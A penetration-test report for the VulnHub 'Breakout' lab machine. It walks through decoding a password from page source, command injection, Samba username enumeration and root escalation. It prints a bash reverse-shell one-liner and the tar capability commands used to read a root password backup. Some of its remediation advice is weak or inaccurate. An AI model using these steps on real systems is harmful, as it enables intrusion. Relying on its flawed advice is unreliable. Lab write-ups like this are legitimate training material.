Penetration Testing Report for
Vuln Hub Company
1. Document information
Report owner: Abhiram SS
Pen-tester: Abhiram SS
Date last updated: 2022-08-22
Machine Name: Breakout
Link: https://www.vulnhub.com/entry/empire-breakout,751/
Index
1. Document information
2. Executive Summary
2.1 Graph
2.2 Disclosed Vulnerabilities
3. Findings and Recommendations
3.1 Critical Risk Vulnerabilities
3.1.1 Encoded Password Disclosure in HTML
3.2 High Risk Vulnerabilities
3.2.1 Command Injection
3.2.2 Password Disclosure in Tar File
3.3 Medium Risk Vulnerabilities
3.3.1 Username Disclosure in RID Cycling
2. Executive Summary
The Breakout machine on the VulnHub platform was used to find vulnerabilities in the machine, and
testing revealed a number of flaws, including several high-risk flaws that could allow unauthorized
access to sensitive information. During this engagement we gained "root privilege", which is
full control over the machine, so this report contains a complete walkthrough of how root
privilege was obtained.
2.1 Graph
[Figure: findings chart by severity (Critical, High, Medium, Low)]
2.2 Disclosed Vulnerabilities

Severity: CRITICAL
Vulnerability: Encoded password disclosure in the HTML
Description: A webpage was discovered during the penetration test. If we look at the bottom of the page's source code, we see a text encoded with the brainf*ck language. Hackers can decode the cipher and gain access to the login page of the web server.
Recommendation: Sensitive data, files and any other item of information that does not need to be on the web server should never be uploaded to it. Don't unnecessarily provide attackers with clues about application behaviour. On the home page on port 80 we see a default Apache page; however, upon opening the source of the page, we see a brainf*ck cipher. We can decode the cipher, which is a menace to the organization.

Severity: HIGH
Vulnerability: Command injection
Description: A webpage was discovered during the penetration test which allows users to ping another machine on the internet. Due to missing input validation, it is possible for a malicious person to inject commands into the user field, which means that besides pinging a host, the page can also execute additional commands given by the user. This could lead to complete compromise of the underlying system.
Recommendation: Use strong input validation on any input passed into commands; this can be achieved with a whitelist of allowed strings or characters. There is a tool called Bright that will examine your application for OS command injection vulnerabilities.

Severity: HIGH
Vulnerability: Password disclosure in tar file
Description: After getting into the server, we found a tar binary, which gave us the exploitable point for root privilege: the tar file was the key to root. The server was under our command thanks to this binary file, so hackers can change or upload corrupted files, which will affect your file system and may lead to a takeover of the system.
Recommendation: After gaining a shell, a hacker will always search for binaries present on the server, so remove such binaries or keep a strong password on the files so that your webpage is secured.

Severity: MEDIUM
Vulnerability: Username disclosure in RID cycling
Description: RID cycling allows users to easily obtain usernames by enumerating Samba shares. This can cause critical damage to the database and server and results in username disclosure, in which all usernames are leaked. This could lead to a complete compromise of the underlying systems.
Recommendation: The Samba server is the greatest threat from outside your immediate network. By default, Samba will accept connections from any host, which means that if you run an insecure version of Samba on a host that is directly connected to the internet, it can be vulnerable. Another good solution is to upgrade Samba to a version where the bug has been fixed. The username was found through Samba enumeration, which is an imminent threat to the company: the enumeration gave me the username of the machine as cyber, and using this username and the previously found password, I could log into the web server.
3. Findings and Recommendations
3.1 Critical Risk Vulnerabilities
The issues marked as "critical severity" can allow attackers to execute code on the web
application or application server, or to access sensitive data. A critical vulnerability is one where
an exploit or proof-of-concept code is publicly available or is being actively exploited.
3.1.1 Encoded password disclosure in the HTML
During the test, we identified a password disclosed in the HTML page, which is critical
damage to the server. The cipher is displayed in the HTML page and can be easily decoded
with standard tools. As a result, avoid putting ciphers on your website, which puts
the server at risk.
Affected Host
http://198.168.19.130
Proof
The cipher at the end of the page.
After decoding the cipher, we got the password for the login page.
Using the decoding tool (https://www.dcode.fr/brainfuck-language), we obtained the password
for the login page. In the above screenshot, we can see a text stating that it is the password for
the user cyber.
Remediation
To prevent this, avoid uploading such encoded text to the web server.
That is the best way to secure the webpage: do not publish ciphers in the page source, so the
server is better protected from hackers.
References
https://portswigger.net/kb/issues/006000b0_source-code-disclosure
https://www.beyondsecurity.com/resources/vulnerabilities/source-disclosure/
https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/source_code_disclosure.htm
3.2 High Risk Vulnerabilities
High risk vulnerabilities can cause serious damage to the server and may lead to data leakage that is
very harmful to company data.
3.2.1 Command injection
During the test, we identified that https://192.168.19.130:20000/shell/?xnavigation=1 has a command
injection vulnerability. Through the above URL, hackers can easily run malicious scripts on the
server. So please remove the command shell part of the login page so that your data is safe
and secure.
Affected Hosts:
https://192.168.19.130:20000/shell/?xnavigation=
Proof:
Executing the command injection
In the above image, we can see that the hacker has entered a malicious script in the command shell
part; this is the place where a hacker obtains a shell, which means full control over the
web server. So please remove this command shell part from the web page.
Gaining the shell from the above script
Command Used: bash -i >& /dev/tcp/<ip>/1234 0>&1
By using this command, I got a shell from the web page; the remote shell is shown in the above screenshot,
where I am inside the web server and able to see all of the data inside it.
Remediation
The most effective way to prevent command injection is to remove the command shell from the
login page so that no hacker can execute malicious commands through the web page. That is the part where
hackers can easily get into the server and gain full control over it.
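The ping feature described above is the classic shape of this bug: the user-supplied host is spliced into a shell string. The following is an added example, not code from the Breakout machine or its web interface, showing that "before" form beside a hardened handler that applies the whitelist validation the recommendation calls for and never hands the value to a shell; the function names and sample inputs are this example's own.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen. Constructed for this example.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def vulnerable_ping_command(host: str) -> str:
    """The 'before' form: the user value is spliced into a shell command line.
    Handed to os.system()/shell=True, any shell metacharacter in host (; | $()
    and so on) turns the ping feature into a general command runner."""
    return "ping -c 1 " + host


def validate_host(host: str) -> bool:
    """Whitelist check: accept only an IP address literal or a DNS hostname."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(host))


def build_ping_argv(host: str) -> list:
    """Hardened form: validate first, then build an argv list so that no shell
    ever parses the value. Raises ValueError for anything outside the whitelist.
    The whitelist also rejects a leading '-', so host cannot become a ping option."""
    if not validate_host(host):
        raise ValueError("host rejected by input whitelist")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Runs the hardened command without a shell and returns ping's exit status."""
    result = subprocess.run(build_ping_argv(host), capture_output=True, timeout=10)
    return result.returncode
```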
References
https://portswigger.net/web-security/os-command-injection
https://brightsec.com/blog/os-command-injection/
https://resources.infosecinstitute.com/topic/how-to-mitigate-command-injection-vulnerabilities/
3.2.2 Password Disclosure in Tar File
After getting a shell from the command injection, we listed suspicious tar binaries owned by root
which we could execute, and that was the key to root access.
Proof
Tar file inside the web server
After enumerating the machine, we see that there is a .old_pass.bak file located in /var/backups,
but we do not have the required permissions to view the file contents.
Command Used: cd /var/backups/
Let's get back to the tar file and see what we can do with it. We need more information about
the capabilities that exist here, so we check the capabilities of the binary on the web server.
Command Used: getcap tar
The tar file has the following capability:
cap_dac_read_search = bypass file read permission checks and directory read and execute
permission checks.
We can add the .old_pass.bak file to a tarball with this binary and then extract it. This should
give us the required permissions to view the contents of the file.
Command Used: ./tar -cf pass.tar /var/backups/.old_pass.bak
Command Used :tar -xf pass.tar
Command Used: cat var/backups/.old_pass.bak
After executing the commands we got the root password. Using this credential we can log into
the root account and get full access.
First, we switch to the root user with the credentials.
Command Used: su root
Then we can see that we have root access, so we can change or modify the webpage.
Command Used: cat root.txt
Remediation
It is advised to remove this tar binary so that a hacker cannot gain root access through it.
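The tar finding above is a file-capability issue: cap_dac_read_search lets an unprivileged user read any file, including the root password backup. The following is an added example, not part of the original report, of a defender-side audit that parses getcap output (both the older "path = caps" and newer "path caps" formats) and flags capabilities that defeat permission checks; the risky-capability list is this example's own choice and the sample output, including the tar path, is constructed.

```python
import re
import subprocess
from typing import Dict, List, Optional, Tuple

# Capabilities that by themselves defeat file permission checks or are
# root-equivalent; this list is the example's own choice, not from the report.
RISKY_CAPS: Dict[str, str] = {
    "cap_dac_read_search": "bypasses file read and directory search permission checks",
    "cap_dac_override": "bypasses read, write and execute permission checks",
    "cap_setuid": "can switch to any uid, including root",
    "cap_setgid": "can switch to any gid",
    "cap_sys_admin": "broad administrative power, effectively root",
    "cap_sys_ptrace": "can attach to and control other processes",
}

# getcap prints "/path = cap_x+ep" (older libcap) or "/path cap_x=ep" (newer).
_LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>cap_\S+)$")


def parse_getcap_line(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (path, [capability names]) for one getcap line, else None."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("path"), re.findall(r"cap_[a-z_]+", m.group("caps"))


def audit_getcap_output(text: str) -> List[Tuple[str, str, str]]:
    """Return (path, capability, reason) for every risky capability found."""
    findings = []
    for line in text.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        findings.extend((path, c, RISKY_CAPS[c]) for c in caps if c in RISKY_CAPS)
    return findings


def audit_live_system(root: str = "/") -> List[Tuple[str, str, str]]:
    """Run 'getcap -r' (part of libcap) over root and audit its output."""
    proc = subprocess.run(["getcap", "-r", root], capture_output=True, text=True)
    return audit_getcap_output(proc.stdout)


# Constructed sample of getcap -r output; the tar path is assumed, since the
# report does not state where the binary lived.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/ping cap_net_raw=ep
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""
```

Running audit_live_system() on a host flags only the tar-style entries, so the same check fits a periodic compliance job; after removing the capability with setcap -r, a re-run should return an empty list.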
References
https://man7.org/linux/man-pages/man7/capabilities.7.html
https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/
3.3 Medium Risk Vulnerabilities
3.3.1 Username Disclosure in RID Cycling
The webpage https://192.168.19.130:20000 is vulnerable to username disclosure. While
enumerating the machine, we found Samba running on it, so I used the enum4linux
tool to check the Samba shares, and we found the user cyber after enumerating them.
Affected Hosts:
https://192.168.19.130:20000
Proof:
In the screenshot below you can see the user cyber.
Command Used: enum4linux -a <ip>
Remediation
It is recommended to upgrade the version of Samba so that there will be no disclosure. There are
many alternatives to a Samba server, such as SuiteDash and Igloo, which are more secure than Samba.
References
https://www.g2.com/products/samba-server-ready-to-go/competitors/alternatives